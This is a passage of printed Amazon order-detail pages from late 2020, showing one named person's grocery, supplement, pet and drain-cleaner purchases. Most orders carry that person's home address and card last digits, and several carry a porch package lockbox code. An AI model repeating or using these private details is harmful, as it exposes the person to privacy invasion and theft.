Foods Market (seller profile) $4.69 Condition: New 1 of: Dubliner Parchment Sold by: Whole Foods Market (seller profile) $3.32 Condition: New 1 of: Harrisburg Dairies, Heavy Cream Quart, 32 Fl Oz Sold by: Whole Foods Market (seller profile) $5.49 Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $82.18 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $82.18 Brian J Coady Estimated tax to be collected: $0.24 1454 Monroe St. NW Washington, DC 20010 Grand Total:$82.42 United States Credit Card transactions Visa ending in 0222: November 2, 2020:$82.42 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-1136893-1077023 Order Placed: November 2, 2020 Amazon.com order number: 114-1136893-1077023 Order Total: $38.07 Shipped on November 2, 2020 Items Ordered 3 of: Green Gobbler Drain Clog Dissolver, 31 oz Sold by: EcoClean Solutions (seller profile) Price $11.97 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Rush Shipping Payment information Payment Method: Item(s) Subtotal: $35.91 Visa | Last digits: 0222 Shipping & Handling: $2.99 Free Shipping: -$2.99 Billing address Brian J Coady Total before tax: $35.911454 Monroe St. NW Estimated tax to be collected: $2.16Washington, DC 20010 United States Grand Total:$38.07 Credit Card transactions Visa ending in 0222: November 2, 2020:$38.07 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6856872-8179445 Order Placed: November 2, 2020 Amazon.com order number: 114-6856872-8179445 Order Total: $31.69 Shipped on November 4, 2020 Items Ordered Price 1 of: Liquid-Plumr Pro-Strength Full Clog Destroyer Plus PipeGuard (80 fl oz (Pack of 2)) Sold by: JAR Enterprise (seller profile) $19.90 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.90 Visa | Last digits: 0222 Shipping & Handling: $10.00 Billing address Total before tax: $29.90Brian J Coady Estimated tax to be collected: $1.791454 Monroe St. NW Washington, DC 20010 Grand Total:$31.69 United States Credit Card transactions Visa ending in 0222: November 4, 2020:$31.69 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5114832-4635458 Subscribe and Save Order Placed: November 4, 2020 Amazon.com order number: 111-5114832-4635458 Order Total: $18.24 This order contains Subscribe & Save items. Shipped on November 18, 2020 Items Ordered Price 1 of: SHEBA PERFECT PORTIONS Soft Wet Cat Food Paté Savory Chicken Entrée and Roasted Turkey Entrée Multipack, (24) 2.6 oz. Easy Peel Twin-Pack Trays Sold by: Amazon.com Services LLC $19.20 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.20 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.96 Billing address Total before tax: $18.24Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$18.24 United States Credit Card transactions AmazonPLCC ending in 3157: November 18, 2020:$18.24 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8113728-5877802 Subscribe and Save Order Placed: November 4, 2020 Amazon.com order number: 114-8113728-5877802 Order Total: $28.49 This order contains Subscribe & Save items. Shipped on November 18, 2020 Items Ordered Price 1 of: LES Labs Inflammatory Health, Joint Supplement for Joint & Muscle Pain and Discomfort, Mobility and Healthy Inflammation Response with Turmeric, Boswe Sold by: LES Labs (seller profile) $29.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $29.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.50 Billing address Total before tax: $28.49Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$28.49 United States Credit Card transactions AmazonPLCC ending in 3157: November 18, 2020:$28.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5450318-6959428 Order Placed: November 5, 2020 Amazon.com order number: 114-5450318-6959428 Order Total: $99.12 Shipped on November 5, 2020 Items Ordered 1 of: PUR 100% Xylitol Chewing Gum, Spearmint -Sugar-Free + Aspartame Free, Vegan + non GMO, 55 Count (Pack of 1) Sold by: Whole Foods Market (seller profile) Price $3.99 Condition: New 1 of: GT's Kombucha, Gingerade 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 1 of: Seventh Generation Chlorine Free Bleach, Free & Clear, 64 oz Sold by: Whole Foods Market (seller profile) $4.79 Condition: New 1 of: 365 Everyday Value, Organic Berry Blend, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.39 Condition: New 2 of: WORLD CENTRIC UTENSIL CORN STARCH ASRTD Sold by: Whole Foods Market (seller profile) $2.42 Condition: New 2 of: Harrisburg Dairies, Half And Half, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $1.49 Condition: New 1 of: 365 Everyday Value, Almonds, Roasted & Salted, 16 oz Sold by: Whole Foods Market (seller profile) $6.99 Condition: New 1 of: World Centric Corn Starch Forks, 24Count Sold by: Whole Foods Market (seller profile) $2.42 Condition: New 2 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 1 of: GTs Enlightened Synergy Organic and Raw Kombucha, Lavender Love, 16 oz Sold by: Whole Foods Market (seller profile) $2.25 Print this page for your records. Condition: New 1 of: Deck Hand, Cat Treats Purrlicious, 3 Ounce Sold by: Whole Foods Market (seller profile) $2.79 Condition: New 1 of: Preserve Cutlery Set Kitchen Supplies, 24 CT, Apple Green Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1 of: Repurpose, Repurpose Eco-To-Go Cups Set 12 Ounce, 12 Count Sold by: Whole Foods Market (seller profile) $5.29 Condition: New 1 of: Naked Truth, Flame-Grilled Chicken Breast Fillets, 10 oz (Frozen) Sold by: Whole Foods Market (seller profile) $3.59 Condition: New 1 of: Gts Living Foods, Kombucha Pomegranate Power Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 1 of: Earthworm, Cleaner Drain Family Safe, 32 Fl Oz Sold by: Whole Foods Market (seller profile) $5.49 Condition: New 1 of: GT's Kombucha, Gingerberry 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 1 of: Aura Cacia Relaxing Lavender Aromatherapy Body Oil | GC/MS Tested for Purity | 118ml (4 fl. oz.) Sold by: Whole Foods Market (seller profile) $8.29 Condition: New 1 of: Kitu Super Coffee, Iced Keto Coffee (0g Added Sugar, 10g Protein, 70 Calories) [Hazelnut] 12 Fl Oz, 1 Pack | Iced Coffee, Protein Coffee, Coffee Drinks -LactoseFree, SoyFree, GlutenFree Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 2 of: World Centric Corn Starch Spoons, 24-Piece Sold by: Whole Foods Market (seller profile) $2.42 Condition: New 1 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 1 of: 365 Everyday Value, Distilled Water, 128 fl oz Sold by: Whole Foods Market (seller profile) $0.89 Condition: New 1 of: Strawberry Conventional, 16 Ounce Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1 of: 365 Everyday Value, Almonds, Roasted & Salted, 10 oz $4.27 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $96.17 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $96.17 Brian J Coady Estimated tax to be collected: $2.951454 Monroe St. NW Washington, DC 20010 Grand Total:$99.12 United States Credit Card transactions AmazonPLCC ending in 3157: November 5, 2020:$99.12 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6075774-0757818 Order Placed: November 8, 2020 Amazon.com order number: 114-6075774-0757818 Order Total: $109.79 Shipped on November 8, 2020 Items Ordered 1 of: Brown Butter Cauliflower Bisque , 24 Ounce Sold by: Whole Foods Market (seller profile) Price $7.99 Condition: New 1 of: WHOLE FOODS MARKET Lobster Bisque, 24 OZ Sold by: Whole Foods Market (seller profile) $9.99 Condition: New 3 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New 1.86 lb of: Chicken Thigh Boneless Skinless Air Chilled Tray Pack Step 2 Sold by: Whole Foods Market (seller profile) ($4.99/lb $9.28 Condition: New 1 of: 4505 Meats, Chicharrones Fried Pork Rinds, Jalapeno Cheddar, 2.5 Ounce Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1.11 lb of: Pork Sausage Link Italian Spicy Step 1 Sold by: Whole Foods Market (seller profile) ($6.99/lb $7.76 Condition: New 2 of: Califia Farms -Keto Coffee Creamer, Unsweetened, 16.9 Oz, Almond Milk & Coconut Cream, Low Calorie, Zero Sugar & Carb, 500mg MCT, Non Dairy, Plant Based, Whole30, Shelf Stable Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 2 of: 365 Everyday Value, Blueberries, 12 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $2.99 Condition: New 1 of: Berry Blueberry Jumbo Conventional, 9.8 Ounce Sold by: Whole Foods Market (seller profile) $5.99 Condition: New 4 of: 365 by Whole Foods Market, Cheese Bar, Sharp Cheddar, 8 Ounce Sold by: Whole Foods Market (seller profile) $2.99 Print this page for your records. Condition: New 1 of: Whole Foods Market, Cream of Mushroom Soup, 24 Ounce $7.99 Sold by: Whole Foods Market (seller profile) Condition: New 6 of: Cabot Seriously Sharp Cheddar Cheese, 8 oz $2.69 Sold by: Whole Foods Market (seller profile) Condition: New 1.13 lb of: Beef Ground 80/20 Step 1 ($4.99/lb Sold by: Whole Foods Market (seller profile) $5.64 Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $109.79 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $109.79 Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$109.79 United States Credit Card transactions AmazonPLCC ending in 3157: November 8, 2020:$109.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0402463-2849869 Subscribe and Save Order Placed: November 9, 2020 Amazon.com order number: 114-0402463-2849869 Order Total: $29.22 This order contains Subscribe & Save items. Shipped on November 23, 2020 Items Ordered Price 1 of: C4 Original Sugar Free Sparkling Energy Drink Midnight Cherry | Pre Workout Performance Drink with No Artificial Colors or Dyes | 16oz (Pack of 12) Sold by: Amazon.com Services LLC $28.48 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.48 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.42 Billing address Total before tax: $27.06Brian J Coady Estimated tax to be collected: $2.161454 Monroe St. NW Washington, DC 20010 Grand Total:$29.22 United States Credit Card transactions Visa ending in 0222: November 23, 2020:$29.22 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-9311540-9355448 Subscribe and Save Order Placed: November 11, 2020 Amazon.com order number: 112-9311540-9355448 Order Total: $14.82 This order contains Subscribe & Save items. Shipped on November 22, 2020 Items Ordered 1 of: Instant Power 1510 Commercial Drain Cleaner, 1-Gallon Sold by: Amazon.com Services LLC Price $13.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $13.98Billing address Estimated tax to be collected: $0.84Brian J Coady 1454 Monroe St. NW Grand Total:$14.82 Washington, DC 20010 United States Credit Card transactions AmazonPLCC ending in 3157: November 22, 2020:$14.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-5057227-7325026 Subscribe and Save Order Placed: October 13, 2020 Amazon.com order number: 114-5057227-7325026 Order Total: $32.61 This order contains Subscribe & Save items. Shipped on November 1, 2020 Items Ordered Price 1 of: New Chapter Calcium Supplement -Bone Strength Whole Food Calcium with Vitamin K2 + D3 + Magnesium, Vegetarian, Gluten Free 120 count (40 day supply) Sold by: Amazon.com Services LLC $38.37 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $38.37 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$5.76 Billing address Total before tax: $32.61Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$32.61 United States Credit Card transactions Visa ending in 0222: November 1, 2020:$32.61 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9336458-0751445 Order Placed: November 9, 2020 Amazon.com order number: 111-9336458-0751445 Order Total: $57.32 Shipped on November 9, 2020 Items Ordered 0.80 lb of: Chicken Wing Teriyaki Fresh Pack Sold by: Whole Foods Market (seller profile) Price ($8.99/lb)$7.19 Condition: New 1 of: 365 Everyday Value, Romaine Hearts Salad Bag Organic, 12 Ounce Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1 of: Berry Blueberry Conventional, 12 Ounce Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1 of: Whole Foods Market, Cream of Mushroom Soup, 24 Ounce Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1 of: Repurpose, Eco-Bigger Bowls 16 Ounce, 20 Count Sold by: Whole Foods Market (seller profile) $4.19 Condition: New 1 of: 365 by Whole Foods Market, Frozen Organic Wild Blueberries, 32 Ounce Sold by: Whole Foods Market (seller profile) $8.49 Condition: New 1 of: Repurpose, Plates Compostable 9 Inch, 20 Count Sold by: Whole Foods Market (seller profile) $4.19 Condition: New 1 of: Harrisburg Dairies, Heavy Cream Quart, 32 Fl Oz Sold by: Whole Foods Market (seller profile) $5.49 Condition: New 4 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) $2.70 Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $56.82 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $56.82 Brian J Coady Estimated tax to be collected: $0.501454 Monroe St. NW Washington, DC 20010 Grand Total:$57.32 United States Credit Card transactions AmazonPLCC ending in 3157: November 9, 2020:$57.32 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2279093-0891422 Subscribe and Save Order Placed: October 13, 2020 Amazon.com order number: 112-2279093-0891422 Order Total: $20.65 This order contains Subscribe & Save items. Shipped on October 23, 2020 Items Ordered Price 1 of: Omega-3 Wild Alaskan Fish Oil (1250mg per Capsule) with Triglyceride EPA & DHA | Heart, Brain & Joint Support | IFOS 5 Star Certified, Non-GMO & Glute Sold by: Sports Research (seller profile) | Product question? Ask Seller $22.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $22.95 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.15 Subscribe & Save: -$1.15Billing address Brian J Coady Total before tax: $20.651454 Monroe St. NW Estimated tax to be collected: $0.00Washington, DC 20010 United States Grand Total:$20.65 Credit Card transactions Visa ending in 0222: October 23, 2020:$20.65 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6012709-6200211 Subscribe and Save Order Placed: October 14, 2020 Amazon.com order number: 114-6012709-6200211 Order Total: $28.49 This order contains Subscribe & Save items. Shipped on November 1, 2020 Items Ordered Price 1 of: LES Labs Inflammatory Health, Joint Supplement for Joint & Muscle Pain and Discomfort, Mobility and Healthy Inflammation Response with Turmeric, Boswe Sold by: LES Labs (seller profile) $29.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $29.99 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.50 Billing address Total before tax: $28.49Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$28.49 United States Credit Card transactions Visa ending in 0222: November 1, 2020:$28.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9665315-5932255 Subscribe and Save Order Placed: October 21, 2020 Amazon.com order number: 111-9665315-5932255 Order Total: $14.82 This order contains Subscribe & Save items. Shipped on November 5, 2020 Items Ordered 1 of: Instant Power 1510 Commercial Drain Cleaner, 1-Gallon Sold by: Amazon.com Services LLC Price $13.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $13.98Billing address Estimated tax to be collected: $0.84Brian J Coady 1454 Monroe St. NW Grand Total:$14.82 Washington, DC 20010 United States Credit Card transactions AmazonPLCC ending in 3157: November 5, 2020:$14.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-7359962-7694611 Order Placed: October 23, 2020 Amazon.com order number: 112-7359962-7694611 Order Total: $63.44 Shipped on November 1, 2020 Items Ordered Price 4 of: Original Manufacturer Filter Bags for Porter-Cable and Stanley 4 Gallon Wet/Dry $14.96 Vacuum -3 Pack Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian Coady 1454 Monroe St NW Porch package lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $59.84 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $59.84 Brian J Coady Estimated tax to be collected: $3.601454 Monroe St. NW Washington, DC 20010 Grand Total:$63.44 United States Credit Card transactions Visa ending in 0222: November 1, 2020:$63.44 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3035406-8352209 Order Placed: October 23, 2020 Amazon.com order number: 111-3035406-8352209 Order Total: $217.89 Shipped on October 23, 2020 Items Ordered 2 of: Preserve Plate Kitchen Supplies, Large, Apple Green Sold by: Whole Foods Market (seller profile) Price $6.99 Condition: New 2 of: Health-Ade Kombucha, Organic, Cherry Berry, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $3.15 Condition: New 1 of: Pepper Anaheim Green Organic, 0.5lb Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: Preserve Cutlery Set Kitchen Supplies, 24 CT, Apple Green Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 2 of: Whole Foods Market, Cream of Mushroom Soup, 24 Ounce Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 1 of: 365 Everyday Value, Romaine Hearts Salad Bag Organic, 12 Ounce Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1 of: 365 Everyday Value, Organic Dark Sweet Cherries, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 2 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 1 of: GT's Kombucha, Gingerberry 16 Fl Oz Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 2 of: Evolved Chocolate | Hazelnut Keto Cups | Keto, Vegan, Paleo, No Sugar, Organic Dark Chocolate Cups | 1 pouch (7 cups) Sold by: Whole Foods Market (seller profile) $9.99 Print this page for your records. Condition: New 2 of: 365 by Whole Foods Market, Frozen Organic Wild Blueberries, 32 Ounce $8.49 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Cabot Seriously Sharp Cheddar Cheese, 8 oz $3.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 4505 Meats Chicharrones Fried Pork Rinds, Jalapeno Cheddar, 2.5 oz $4.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: EATING EVOLVED Organic Almond Butter Keto Cups 7 Count, 4.93 OZ $9.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Stalk Market, Plates Paper Dessert 7 Inch, 35 Count $6.99 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Wild-Caught Breaded Fish Fillets, 12 oz (Frozen) $5.99 Sold by: Whole Foods Market (seller profile) Condition: New 3 of: Evolved Chocolate -Organic Keto Chocolate Bar, Midnight Coconut, 100% Cacao $3.79 -Keto, Dairy-Free, Soy-Free, Paleo Friendly, Vegan Friendly, No Added Sugar, Dark Chocolate -2.3 oz each (8 Count) Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Harrisburg Dairies, Heavy Cream Quart, 32 Fl Oz $5.49 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Raspberry Red Organic, 6 Ounce $2.70 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Sustainably Yours, Cat Litter Multi Cat Plus, 208 Ounce $19.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Organic Walnuts, Halves & Pieces, 10 oz $8.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Greens Dandelion Organic, 1 Bunch $2.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Repurpose, Eco-Bigger Bowls 16 Ounce, 20 Count $4.19 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Organic Almonds, Roasted & Salted, 10 oz $7.99 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $212.39 Visa | Last digits: 0222 Shipping & Handling: $0.00 Billing address Total before tax: $212.39 Brian J Coady Estimated tax to be collected: $5.501454 Monroe St. NW Washington, DC 20010 Grand Total:$217.89 United States Credit Card transactions Visa ending in 0222: October 23, 2020:$217.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-1182104-8034603 Subscribe and Save Order Placed: October 28, 2020 Amazon.com order number: 113-1182104-8034603 Order Total: $14.99 This order contains Subscribe & Save items. Shipped on November 11, 2020 Items Ordered Price 1 of: TEMPTATIONS Classic Crunchy and Soft Cat Treats Tasty Chicken Flavor, 30 Oz. $15.78 Tub Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $15.78 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.79 Billing address Total before tax: $14.99Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$14.99 United States Credit Card transactions AmazonPLCC ending in 3157: November 11, 2020:$14.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-2957564-1953001 Order Placed: October 3, 2020 Amazon.com order number: 113-2957564-1953001 Order Total: $98.14 Shipped on October 3, 2020 Items Ordered 1 of: Harrisburg Dairies, Heavy Cream Quart, 32 Fl Oz Sold by: Whole Foods Market (seller profile) Price $5.49 Condition: New 1 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 1 of: Earthworm, Cleaner Drain Family Safe, 32 Fl Oz Sold by: Whole Foods Market (seller profile) $5.49 Condition: New 1 of: Moon Cheese -100% Natural Cheese Snack -Cheddar -2 oz Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: Gts Living Foods, Kombucha Rose Berry Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $2.25 Condition: New 2 of: Evolved Chocolate -Organic Keto Chocolate Bar, Midnight Coconut, 100% Cacao -Keto, Dairy-Free, Soy-Free, Paleo Friendly, Vegan Friendly, No Added Sugar, Dark Chocolate -2.3 oz each (8 Count) Sold by: Whole Foods Market (seller profile) $4.99 Condition: New 1 of: Harrisburg Dairies, Heavy Cream Quart, 32 Fl Oz Sold by: Whole Foods Market (seller profile) $5.49 Condition: New 3 of: 365 Everyday Value, Organic Dark Sweet Cherries, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: Strawberry Conventional, 16 Ounce Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1 of: KeVita Master Brew Kombucha, Ginger, with Live Probiotics, 15.2 oz. Sold by: Whole Foods Market (seller profile) $2.69 Print this page for your records. Condition: New 1 of: Stacy's Cheese Petites Parmesan with Rosemary, 4oz Bag Sold by: Whole Foods Market (seller profile) $3.60 Condition: New 1 of: PUR 100% Xylitol Chewing Gum, Spearmint -Sugar-Free + Aspartame Free, Vegan + non GMO, 55 Count (Pack of 1) Sold by: Whole Foods Market (seller profile) $3.15 Condition: New 1 of: Moon Cheese -100% Natural Cheese Snack -Gouda -2 oz Sold by: Whole Foods Market (seller profile) $3.99 Condition: New 1.61 lb of: Chix Mock General TSO Vegan Chef's Case Sold by: Whole Foods Market (seller profile) ($11.99/lb $19.30 Condition: New 2 (0.88 lb) of: Nectarine White Tree Ripe Conventional, 1 Each Sold by: Whole Foods Market (seller profile) ($2.24/lb $1.97 Condition: New 2 of: Berry Raspberry Red Conventional, 12 Ounce Sold by: Whole Foods Market (seller profile) $4.49 Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $97.02 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $97.02 Brian J Coady Estimated tax to be collected: $1.12 1454 Monroe St. NW Washington, DC 20010 Grand Total:$98.14 United States Credit Card transactions AmazonPLCC ending in 3157: October 3, 2020:$98.14 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-9638260-9875412 Order Placed: October 4, 2020 Amazon.com order number: 112-9638260-9875412 Order Total: $13.29 Shipped on October 5, 2020 Items Ordered 1 of: EasyKlip 4101 Midi Tarp Clip, 4-Pack, Black Sold by: Amazon.com Services LLC Price $12.54 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $12.54 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $12.54 Brian J Coady Estimated tax to be collected: $0.751454 Monroe St. NW Washington, DC 20010 Grand Total:$13.29 United States Credit Card transactions AmazonPLCC ending in 3157: October 5, 2020:$13.29 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-7584569-7996204 Subscribe and Save Order Placed: October 6, 2020 Amazon.com order number: 114-7584569-7996204 Order Total: $11.25 This order contains Subscribe & Save items. Shipped on October 24, 2020 Items Ordered Price 1 of: TEMPTATIONS Classic Crunchy and Soft Cat Treats Tasty Chicken Flavor, 30 Oz. $11.84 Tub Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $11.84 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$0.59 Billing address Total before tax: $11.25Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$11.25 United States Credit Card transactions Visa ending in 0222: October 